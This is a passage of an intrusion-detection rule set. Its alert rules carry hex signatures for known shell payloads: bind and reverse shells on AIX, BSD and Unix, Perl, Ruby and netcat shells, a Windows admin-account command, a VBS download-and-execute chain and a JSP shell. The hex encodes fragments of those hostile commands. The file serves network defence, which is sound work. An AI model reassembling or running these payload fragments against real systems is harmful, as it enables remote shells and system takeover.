alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"aix/ppc/shell_bind_tcp"; flow:established; content:"| 7f ff fa 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 3b de fe 1d 7f c9 03 a6 4e 80 04 20 4c c6 33 42 44 ff ff 02 3b de ff f8 3b a0 07 ff 7c a5 2a 78 38 9d f8 02 38 7d f8 03 38 5d f8 f4 7f c9 03 a6 4e 80 04 21 7c 7c 1b 78 38 bd f8 11 3f 60 ff 02 63 7b 00 |"; content:"| 97 e1 ff fc 97 61 ff fc 7c 24 0b 78 38 5d f8 f3 7f c9 03 a6 4e 80 04 21 7c 84 22 78 7f 83 e3 78 38 5d f8 f1 7f c9 03 a6 4e 80 04 21 7c a5 2a 78 7c 84 22 78 7f 83 e3 78 38 5d f8 ee 7f c9 03 a6 4e 80 04 21 7c 7a 1b 78 3b 3d f8 03 7f 23 cb 78 38 5d f9 17 7f c9 03 a6 4e 80 04 21 7f 25 cb 78 7c 84 22 78 7f 43 d3 78 38 5d fa 93 7f c9 03 a6 4e 80 04 21 37 39 ff ff 40 80 ff d4 7c a5 2a 79 40 82 ff fd 7f 08 02 a6 3b 18 01 ff 38 78 fe 29 98 b8 fe 31 94 a1 ff fc 94 61 ff fc 7c 24 0b 78 38 5d f8 08 7f c9 03 a6 4e 80 04 21 2f 62 69 6e 2f 63 73 68 |"; sid:1000000; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"aix/ppc/shell_find_port"; flow:established; content:"| 7f ff fa 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 3b de fe 1d 7f c9 03 a6 4e 80 04 20 4c c6 33 42 44 ff ff 02 3b de ff f8 3b a0 07 ff 97 e1 ff fc 7c 3c 0b 78 3b 7d f8 2d 97 61 ff fc 7c 3b 0b 78 3b ff 01 ff 3b ff fe 02 7f 65 db 78 7f 84 e3 78 7f e3 fb 78 38 5d f8 d4 7f c9 03 a6 4e 80 04 21 3b 5c 01 ff a3 5a fe 03 28 1a |"; content:"| 40 82 ff d4 3b 3d f8 03 7f 23 cb 78 38 5d f9 17 7f c9 03 a6 4e 80 04 21 7f 25 cb 78 7c 84 22 78 7f e3 fb 78 38 5d fa 93 7f c9 03 a6 4e 80 04 21 37 39 ff ff 40 80 ff d4 7c a5 2a 79 40 82 ff fd 7f 08 02 a6 3b 18 01 ff 38 78 fe 29 98 b8 fe 31 94 a1 ff fc 94 61 ff fc 7c 24 0b 78 38 5d f8 08 7f c9 03 a6 4e 80 04 21 2f 62 69 6e 2f 63 73 68 |"; sid:1000001; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"aix/ppc/shell_interact"; flow:established; content:"| 7c a5 2a 79 40 82 ff fd 7f e8 02 a6 3b ff 01 20 38 7f ff 08 38 9f ff 10 90 7f ff 10 90 bf ff 14 88 5f ff 0f 98 bf ff 0f 4c c6 33 42 44 ff ff 02 2f 62 69 6e 2f 73 68 05 |"; sid:1000002; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"aix/ppc/shell_reverse_tcp"; flow:established; content:"| 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 3b de fe 25 7f c9 03 a6 4e 80 04 20 ff 02 00 |"; content:"| 4c c6 33 42 44 ff ff 02 3b de ff f8 3b a0 07 ff 38 9d f8 02 38 7d f8 03 38 5d f8 f4 7f c9 03 a6 4e 80 04 21 7c 7c 1b 78 38 bd f8 11 38 9e ff f8 38 5d f8 f5 7f c9 03 a6 4e 80 04 21 3b 7d f8 03 7f 63 db 78 38 5d f9 17 7f c9 03 a6 4e 80 04 21 7f 65 db 78 7c 84 22 78 7f 83 e3 78 38 5d fa 93 7f c9 03 a6 4e 80 04 21 37 7b ff ff 40 80 ff d4 7c a5 2a 79 40 82 ff fd 7f 08 02 a6 3b 18 01 ff 38 78 fe 29 98 b8 fe 31 94 a1 ff fc 94 61 ff fc 7c 24 0b 78 38 5d f8 08 7f c9 03 a6 4e 80 04 21 2f 62 69 6e 2f 63 73 68 |"; sid:1000003; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/sparc/shell_bind_tcp"; flow:established; content:"| 9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10 20 02 82 10 20 61 91 d0 20 08 d0 23 bf f8 21 3f c0 80 e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20 10 82 10 20 68 91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20 6a 91 d0 20 08 d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20 1e 91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2 60 01 82 10 20 5a 91 d0 20 08 12 bf ff fd d0 03 bf f8 94 1a c0 0b 21 0b d8 9a a0 14 21 6e 23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf f0 d0 23 bf f8 c0 23 bf fc 82 10 20 3b 91 d0 20 08 |"; sid:1000004; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/sparc/shell_reverse_tcp"; flow:established; content:"| 9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10 20 02 82 10 20 61 91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2 60 01 82 10 20 5a 91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f c0 80 23 1f c0 00 a2 14 60 01 e0 3b bf f0 92 23 a0 10 94 10 20 10 82 10 20 62 91 d0 20 08 94 1a c0 0b 21 0b d8 9a a0 14 21 6e 23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf f0 d0 23 bf f8 c0 23 bf fc 82 10 20 3b 91 d0 20 08 |"; sid:1000005; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/exec"; flow:established; content:"| 6a 3b 58 99 52 68 2d 63 00 00 89 e7 52 68 6e 2f 73 68 68 2f 2f 62 69 89 e3 52 e8 0a 00 00 00 |"; content:"| 74 68 69 6e 67 |"; content:"| 00 57 53 89 e1 52 51 53 50 cd 80 |"; sid:1000006; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell/bind_tcp"; flow:established; content:"| 6a 61 58 99 52 68 10 02 00 |"; content:"| 89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52 6a 68 58 cd 80 b0 6a cd 80 52 53 b6 10 52 b0 1e cd 80 51 50 51 97 6a 03 58 cd 80 c3 |"; sid:1000007; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell/find_tag"; flow:established; content:"| 31 d2 52 89 e6 52 52 b2 80 52 b6 0c 52 56 52 52 66 ff 46 e8 6a 1d 58 cd 80 81 3e |"; content:"| 75 ef fc ad 5a 5f 5a ff e6 |"; sid:1000008; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell/reverse_tcp"; flow:established; content:"| 6a 61 58 99 52 42 52 42 52 68 |"; content:"| cd 80 68 10 02 00 |"; content:"| 89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 b0 03 c6 41 fd 10 cd 80 c3 |"; sid:1000009; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell_bind_tcp"; flow:established; content:"| 31 c0 50 68 ff 02 00 |"; content:"| 89 e7 50 6a 01 6a 02 6a 10 b0 61 cd 80 57 50 50 6a 68 58 cd 80 89 47 ec b0 6a cd 80 b0 1e cd 80 50 50 6a 5a 58 cd 80 ff 4f e4 79 f6 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 50 b0 3b cd 80 |"; sid:1000010; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell_find_port"; flow:established; content:"| 31 c0 50 89 e7 6a 10 54 57 50 50 58 58 40 50 50 6a 1f 58 cd 80 66 81 7f 02 |"; content:"| 75 ee 50 6a 5a 58 cd 80 ff 4f f0 79 f6 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 50 b0 3b cd 80 |"; sid:1000011; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell_find_tag"; flow:established; content:"| 31 d2 52 89 e6 52 52 b2 80 52 b6 0c 52 56 52 52 66 ff 46 e8 6a 1d 58 cd 80 81 3e |"; content:"| 75 ef 5a 5f 6a 02 59 6a 5a 58 51 57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 53 b0 3b cd 80 |"; sid:1000012; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsd/x86/shell_reverse_tcp"; flow:established; content:"| 68 ff 02 00 |"; content:"| 89 e7 31 c0 50 6a 01 6a 02 6a 10 b0 61 cd 80 57 50 50 6a 62 58 cd 80 50 6a 5a 58 cd 80 ff 4f e8 79 f6 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 50 b0 3b cd 80 |"; sid:1000013; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsdi/x86/shell/bind_tcp"; flow:established; content:"| 89 e5 68 00 07 00 c3 b8 9a 00 00 00 99 50 89 e6 31 c0 50 40 50 40 50 b0 61 ff d6 52 68 10 02 00 |"; content:"| 89 e3 6a 10 53 50 6a 68 58 ff d6 b0 6a ff d6 59 52 52 51 b0 1e ff d6 97 6a 03 58 b6 0c 52 55 57 ff d6 ff e5 |"; sid:1000014; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsdi/x86/shell/reverse_tcp"; flow:established; content:"| 89 e5 68 00 07 00 c3 b8 9a 00 00 00 99 50 89 e6 52 42 52 42 52 6a 61 58 ff d6 97 68 |"; content:"| 68 10 02 00 |"; content:"| 89 e3 6a 10 53 57 6a 62 58 ff d6 b0 03 b6 0c 52 55 57 ff d6 5f c3 |"; sid:1000015; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsdi/x86/shell_bind_tcp"; flow:established; content:"| 89 e5 68 00 07 00 c3 b8 9a 00 00 00 99 50 89 e6 31 c0 50 40 50 40 50 b0 61 ff d6 52 68 10 02 00 |"; content:"| 89 e3 6a 10 53 50 6a 68 58 ff d6 b0 6a ff d6 59 52 52 51 b0 1e ff d6 97 6a 02 59 6a 5a 58 51 57 ff d6 49 79 f6 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 b0 3b ff d6 |"; sid:1000016; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsdi/x86/shell_find_port"; flow:established; content:"| 68 00 07 00 c3 b8 9a 00 00 00 99 50 89 e7 31 f6 83 ec 10 89 e1 6a 10 89 e3 46 6a 1f 58 53 51 56 ff d7 83 c4 0c 66 81 79 02 |"; content:"| 75 ec 6a 02 59 b0 5a 51 56 ff d7 49 79 f7 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 b0 3b ff d7 |"; sid:1000017; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bsdi/x86/shell_reverse_tcp"; flow:established; content:"| 89 e5 68 00 07 00 c3 b8 9a 00 00 00 99 50 89 e6 52 42 52 42 52 6a 61 58 ff d6 97 68 |"; content:"| 68 10 02 00 |"; content:"| 89 e3 6a 10 53 57 6a 62 58 ff d6 b0 5a 52 57 ff d6 4a 79 f7 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 53 b0 3b ff d6 |"; sid:1000018; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/bind_inetd"; flow:established; content:"| 63 70 20 2f 65 74 63 2f 73 65 72 76 69 63 65 73 20 2f 74 6d 70 2f 2e |"; content:"| 3b 65 63 68 6f 20 |"; content:"| 2f 74 63 70 3e 3e 2f 65 74 63 2f 73 65 72 76 69 63 65 73 3b 65 63 68 6f 20 |"; content:"| 20 73 74 72 65 61 6d 20 74 63 70 20 6e 6f 77 61 69 74 20 72 6f 6f 74 20 2f 62 69 6e 2f 73 68 20 73 68 3e 2f 74 6d 70 2f 2e |"; content:"| 3b 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f 2e |"; content:"| 20 7c 7c 2f 75 73 72 2f 73 62 69 6e 2f 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f 2e |"; content:"| 20 7c 7c 2f 75 73 72 2f 65 74 63 2f 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f 2e |"; content:"| 3b 63 70 20 2f 74 6d 70 2f 2e |"; content:"| 20 2f 65 74 63 2f 73 65 72 76 69 63 65 73 3b 72 6d 20 2f 74 6d 70 2f 2e |"; content:"| 20 2f 74 6d 70 2f 2e |"; sid:1000019; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/bind_netcat"; flow:established; content:"| 6e 63 20 2d 6c 70 20 |"; content:"| 20 2d 65 20 2f 62 69 6e 2f 73 68 |"; sid:1000020; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/bind_perl"; flow:established; content:"| 70 65 72 6c 20 2d 4d 49 4f 20 2d 65 20 27 24 70 3d 66 6f 72 6b 28 29 3b 65 78 69 74 2c 69 66 24 70 3b 24 63 3d 6e 65 77 20 49 4f 3a 3a 53 6f 63 6b 65 74 3a 3a 49 4e 45 54 28 4c 6f 63 61 6c 50 6f 72 74 2c |"; content:"| 2c 52 65 75 73 65 2c 31 2c 4c 69 73 74 65 6e 29 2d 3e 61 63 63 65 70 74 3b 24 7e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 77 29 3b 53 54 44 49 4e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 72 29 3b 73 79 73 74 65 6d 24 5f 20 77 68 69 6c 65 3c 3e 27 |"; sid:1000021; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/bind_ruby"; flow:established; content:"| 72 75 62 79 20 2d 72 73 6f 63 6b 65 74 20 2d 65 20 27 65 78 69 74 20 69 66 20 66 6f 72 6b 3b 73 3d 54 43 50 53 65 72 76 65 72 2e 6e 65 77 28 22 |"; content:"| 22 29 3b 77 68 69 6c 65 28 63 3d 73 2e 61 63 63 65 70 74 29 3b 77 68 69 6c 65 28 63 6d 64 3d 63 2e 67 65 74 73 29 3b 49 4f 2e 70 6f 70 65 6e 28 63 6d 64 2c 22 72 22 29 7b 7c 69 6f 7c 63 2e 70 72 69 6e 74 20 69 6f 2e 72 65 61 64 7d 65 6e 64 3b 65 6e 64 27 |"; sid:1000022; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/generic"; flow:established; content:"| 74 68 69 6e 67 |"; sid:1000023; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/reverse"; flow:established; content:"| 73 68 20 2d 63 20 27 28 73 6c 65 65 70 20 |"; content:"| 7c 74 65 6c 6e 65 74 20 |"; content:"| 7c 77 68 69 6c 65 20 3a 20 3b 20 64 6f 20 73 68 20 26 26 20 62 72 65 61 6b 3b 20 64 6f 6e 65 20 32 3e 26 31 7c 74 65 6c 6e 65 74 20 |"; content:"| 20 3e 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 26 29 27 |"; sid:1000024; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/reverse_bash"; flow:established; content:"| 2d 3b 65 78 65 63 20 |"; content:"| 3c 3e 2f 64 65 76 2f 74 63 70 2f |"; content:"| 3b 73 68 20 3c 26 |"; content:"| 20 32 3e 26 |"; sid:1000025; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/reverse_netcat"; flow:established; content:"| 20 2d 65 20 2f 62 69 6e 2f 73 68 20 |"; sid:1000026; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/reverse_perl"; flow:established; content:"| 70 65 72 6c 20 2d 4d 49 4f 20 2d 65 20 27 24 70 3d 66 6f 72 6b 3b 65 78 69 74 2c 69 66 28 24 70 29 3b 24 63 3d 6e 65 77 20 49 4f 3a 3a 53 6f 63 6b 65 74 3a 3a 49 4e 45 54 28 50 65 65 72 41 64 64 72 2c 22 |"; content:"| 22 29 3b 53 54 44 49 4e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 72 29 3b 24 7e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 77 29 3b 73 79 73 74 65 6d 24 5f 20 77 68 69 6c 65 3c 3e 3b 27 |"; sid:1000027; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/unix/reverse_ruby"; flow:established; content:"| 72 75 62 79 20 2d 72 73 6f 63 6b 65 74 20 2d 65 20 27 65 78 69 74 20 69 66 20 66 6f 72 6b 3b 63 3d 54 43 50 53 6f 63 6b 65 74 2e 6e 65 77 28 22 |"; content:"| 22 29 3b 77 68 69 6c 65 28 63 6d 64 3d 63 2e 67 65 74 73 29 3b 49 4f 2e 70 6f 70 65 6e 28 63 6d 64 2c 22 72 22 29 7b 7c 69 6f 7c 63 2e 70 72 69 6e 74 20 69 6f 2e 72 65 61 64 7d 65 6e 64 27 |"; sid:1000028; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/windows/adduser"; flow:established; content:"| 63 6d 64 2e 65 78 65 20 2f 63 20 6e 65 74 20 75 73 65 72 20 6d 65 74 61 73 70 6c 6f 69 74 20 6d 65 74 61 73 70 6c 6f 69 74 20 2f 41 44 44 20 26 26 20 6e 65 74 20 6c 6f 63 61 6c 67 72 6f 75 70 20 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 20 6d 65 74 61 73 70 6c 6f 69 74 20 2f 41 44 44 |"; sid:1000029; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/windows/bind_perl"; flow:established; content:"| 70 65 72 6c 20 2d 4d 49 4f 20 2d 65 20 22 77 68 69 6c 65 28 24 63 3d 6e 65 77 20 49 4f 3a 3a 53 6f 63 6b 65 74 3a 3a 49 4e 45 54 28 4c 6f 63 61 6c 50 6f 72 74 2c |"; content:"| 2c 52 65 75 73 65 2c 31 2c 4c 69 73 74 65 6e 29 2d 3e 61 63 63 65 70 74 29 7b 24 7e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 77 29 3b 53 54 44 49 4e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 72 29 3b 73 79 73 74 65 6d 24 5f 20 77 68 69 6c 65 3c 3e 7d 22 |"; sid:1000030; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/windows/bind_ruby"; flow:established; content:"| 72 75 62 79 20 2d 72 73 6f 63 6b 65 74 20 2d 65 20 27 73 3d 54 43 50 53 65 72 76 65 72 2e 6e 65 77 28 22 |"; content:"| 22 29 3b 77 68 69 6c 65 28 63 3d 73 2e 61 63 63 65 70 74 29 3b 77 68 69 6c 65 28 63 6d 64 3d 63 2e 67 65 74 73 29 3b 49 4f 2e 70 6f 70 65 6e 28 63 6d 64 2c 22 72 22 29 7b 7c 69 6f 7c 63 2e 70 72 69 6e 74 20 69 6f 2e 72 65 61 64 7d 65 6e 64 3b 65 6e 64 27 |"; sid:1000031; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/windows/download_exec_vbs"; flow:established; content:"| 63 6d 64 2e 65 78 65 20 2f 71 20 2f 63 20 65 63 68 6f 20 53 65 74 20 |"; content:"| 3d 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 20 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 |"; content:"| 2e 4f 70 65 6e 20 22 47 45 54 22 2c 22 2f 66 69 6c 65 |"; content:"| 22 2c 46 61 6c 73 65 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 |"; content:"| 2e 53 65 6e 64 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 53 65 74 20 |"; content:"| 3d 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 |"; content:"| 2e 54 79 70 65 3d 31 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 |"; content:"| 2e 4f 70 65 6e 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 |"; content:"| 2e 57 72 69 74 65 20 |"; content:"| 2e 72 65 73 70 6f 6e 73 65 42 6f 64 79 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 |"; content:"| 2e 53 61 76 65 54 6f 46 69 6c 65 20 22 25 74 6d 70 25 5c |"; content:"| 2e 65 78 65 22 2c 32 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 |"; content:"| 29 2e 52 75 |"; content:"| 74 6d 70 25 5c |"; content:"| 2e 65 78 65 22 20 3e 3e |"; content:"| 2e 76 62 73 26 65 63 68 6f 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 22 29 2e 44 65 6c 65 74 65 46 69 6c 65 20 22 |"; content:"| 2e 76 62 73 22 20 3e 3e |"; content:"| 2e 76 62 73 26 73 74 61 72 74 20 |"; content:"| 2e 76 62 73 |"; sid:1000032; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/windows/reverse_perl"; flow:established; content:"| 70 65 72 6c 20 2d 4d 49 4f 20 2d 65 20 22 24 63 3d 6e 65 77 20 49 4f 3a 3a 53 6f 63 6b 65 74 3a 3a 49 4e 45 54 28 50 65 65 72 41 64 64 72 2c 5c 22 |"; content:"| 5c 22 29 3b 53 54 44 49 4e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 72 29 3b 24 7e 2d 3e 66 64 6f 70 65 6e 28 24 63 2c 77 29 3b 73 79 73 74 65 6d 24 5f 20 77 68 69 6c 65 3c 3e 3b 22 |"; sid:1000033; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"cmd/windows/reverse_ruby"; flow:established; content:"| 72 75 62 79 20 2d 72 73 6f 63 6b 65 74 20 2d 65 20 27 63 3d 54 43 50 53 6f 63 6b 65 74 2e 6e 65 77 28 22 |"; content:"| 22 29 3b 77 68 69 6c 65 28 63 6d 64 3d 63 2e 67 65 74 73 29 3b 49 4f 2e 70 6f 70 65 6e 28 63 6d 64 2c 22 72 22 29 7b 7c 69 6f 7c 63 2e 70 72 69 6e 74 20 69 6f 2e 72 65 61 64 7d 65 6e 64 27 |"; sid:1000034; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"java/jsp_shell_bind_tcp"; flow:established; content:"| 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 6c 61 6e 67 2e 2a 22 25 3e 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 75 74 69 6c 2e 2a 22 25 3e 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 69 6f 2e 2a 22 25 3e 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 6e 65 74 2e 2a 22 25 3e 0a 0a 09 09 09 3c 25 0a 09 09 09 09 63 6c 61 73 73 20 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 20 65 78 74 65 6e 64 73 20 54 68 72 65 61 64 0a 09 09 09 09 7b 0a 09 09 09 09 09 49 6e 70 75 74 53 74 72 65 61 6d 20 69 73 3b 0a 09 09 09 09 09 4f 75 74 70 75 74 53 74 72 65 61 6d 20 6f 73 3b 0a 0a 09 09 09 09 09 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 28 20 49 6e 70 75 74 53 74 72 65 61 6d 20 69 73 2c 20 4f 75 74 70 75 74 53 74 72 65 61 6d 20 6f 73 20 29 0a 09 09 09 09 09 7b 0a 09 09 09 09 09 09 74 68 69 73 2e 69 73 20 3d 20 69 73 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 6f 73 20 3d 20 6f 73 |"; content:"| 3b 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 70 75 62 6c 69 63 20 76 6f 69 64 20 72 75 6e 28 29 0a 09 09 09 09 09 7b 0a 09 09 09 09 09 09 42 75 66 66 65 72 65 64 52 65 61 64 65 72 20 69 6e 20 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 42 75 66 66 65 72 65 64 57 72 69 74 65 72 20 6f 75 74 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 74 72 79 0a 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 69 6e 20 20 3d 20 6e 65 77 20 42 75 66 66 65 72 65 64 52 65 61 64 65 72 28 20 6e 65 77 20 49 6e 70 75 74 53 74 72 65 61 6d 52 65 61 64 65 72 28 20 74 68 69 73 2e 69 73 20 29 20 29 3b 0a 09 09 09 09 09 09 09 6f 75 74 20 3d 20 6e 65 77 20 42 75 66 66 65 72 65 64 57 72 69 74 65 72 28 20 6e 65 77 20 4f 75 74 70 75 74 53 74 72 65 61 6d 57 72 69 74 65 72 28 20 74 68 69 73 2e 6f 73 20 29 20 29 3b 0a 09 09 09 09 09 09 09 63 68 61 72 20 62 75 66 66 65 72 5b 5d 20 3d 20 6e 65 77 20 63 68 61 72 5b 38 31 39 32 5d 3b 0a 09 09 09 09 09 09 09 69 6e 74 20 6c 65 6e 67 74 68 3b 0a 09 09 09 09 09 09 09 77 68 69 6c 65 |"; content:"| 20 28 20 6c 65 6e 67 74 68 20 3d 20 69 6e 2e 72 65 61 64 28 20 62 75 66 66 65 72 2c 20 30 2c 20 62 75 66 66 65 72 2e 6c 65 6e 67 74 68 20 29 20 29 20 3e 20 30 20 29 0a 09 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 09 6f 75 74 2e 77 72 69 74 65 28 20 62 75 66 66 65 72 2c 20 30 2c 20 6c 65 6e 67 74 68 20 29 3b 0a 09 09 09 09 09 09 09 09 6f 75 74 2e 66 6c 75 73 68 28 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 28 20 45 78 63 65 70 74 69 6f 6e 20 65 20 29 7b 7d 0a 09 09 09 09 09 09 74 72 79 0a 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 69 66 28 20 69 6e 20 21 3d 20 6e 75 6c 6c 20 29 0a 09 09 09 09 09 09 09 09 69 6e 2e 63 6c 6f 73 65 28 29 3b 0a 09 09 09 09 09 09 09 69 66 28 20 6f 75 74 20 21 3d 20 6e 75 6c 6c 20 29 0a 09 09 09 09 09 09 09 09 6f 75 74 2e 63 6c 6f 73 65 28 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 28 20 45 78 63 65 70 74 69 6f 6e 20 65 20 29 7b 7d 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 0a 09 09 09 09 74 72 79 0a 09 09 09 09 7b |"; content:"| 09 09 09 09 09 53 65 72 76 65 72 53 6f 63 6b 65 74 20 73 65 72 76 65 72 5f 73 6f 63 6b 65 74 20 3d 20 6e 65 77 20 53 65 72 76 65 72 53 6f 63 6b 65 74 28 20 |"; content:"| 20 29 3b 0a 09 09 09 09 09 53 6f 63 6b 65 74 20 63 6c 69 65 6e 74 5f 73 6f 63 6b 65 74 20 3d 20 73 65 72 76 65 72 5f 73 6f 63 6b 65 74 2e 61 63 63 65 70 74 28 29 3b 0a 09 09 09 09 09 73 65 72 76 65 72 5f 73 6f 63 6b 65 74 2e 63 6c 6f 73 65 28 29 3b 0a 09 09 09 09 09 50 72 6f 63 65 73 73 20 70 72 6f 63 65 73 73 20 3d 20 52 75 6e 74 69 6d 65 2e 67 65 74 52 75 6e 74 69 6d 65 28 29 2e 65 78 65 63 28 20 22 63 6d 64 2e 65 78 65 22 20 29 3b 0a 09 09 09 09 09 28 20 6e 65 77 20 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 28 20 70 72 6f 63 65 73 73 2e 67 65 74 49 6e 70 75 74 53 74 72 65 61 6d 28 29 2c 20 63 6c 69 65 6e 74 5f 73 6f 63 6b 65 74 2e 67 65 74 4f 75 74 70 75 74 53 74 72 65 61 6d 28 29 20 29 20 29 2e 73 74 61 72 74 28 29 3b 0a 09 09 09 09 09 28 20 6e 65 77 20 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 28 20 63 6c 69 65 |"; content:"| 5f 73 6f 63 6b 65 74 2e 67 65 74 49 6e 70 75 74 53 74 72 65 61 6d 28 29 2c 20 70 72 6f 63 65 73 73 2e 67 65 74 4f 75 74 70 75 74 53 74 72 65 61 6d 28 29 20 29 20 29 2e 73 74 61 72 74 28 29 3b 0a 09 09 09 09 7d 20 63 61 74 63 68 28 20 45 78 63 65 70 74 69 6f 6e 20 65 20 29 20 7b 7d 0a 09 09 09 25 3e 0a 09 09 |"; sid:1000035; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"java/jsp_shell_reverse_tcp"; flow:established; content:"| 0a 09 09 09 3c 